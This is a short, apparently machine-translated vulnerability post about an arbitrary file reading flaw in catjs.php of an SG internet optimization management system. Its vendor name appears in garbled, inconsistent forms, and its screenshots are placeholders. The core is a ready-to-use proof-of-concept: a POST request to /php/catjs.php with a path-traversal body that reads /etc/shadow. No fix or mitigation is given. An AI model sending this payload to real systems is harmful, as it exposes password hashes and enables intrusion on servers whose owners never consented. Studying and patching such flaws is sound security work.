Post

Deepin Service Sg Internet Optimization Management System Catjs Php Arbitrary File Reading Vulnerability

Deepin Service Sg Internet Optimization Management System Catjs Php Arbitrary File Reading Vulnerability

#Shenxinshui SG Internet Optimization Management System catjs.php Any file reading vulnerability

Vulnerability Description

Deepin SG Internet Optimization Management System catjs.php has an arbitrary file reading vulnerability, and attackers can obtain sensitive files on the server through the vulnerability.

Vulnerability Impact

Shenxinshui SG Internet Optimization Management System

Network surveying and mapping

Vulnerability reappears

Login page

img

Verify POC

POST /php/catjs.php

["../../../../../../etc/shadow"]

img

This post is licensed under CC BY 4.0 by the author.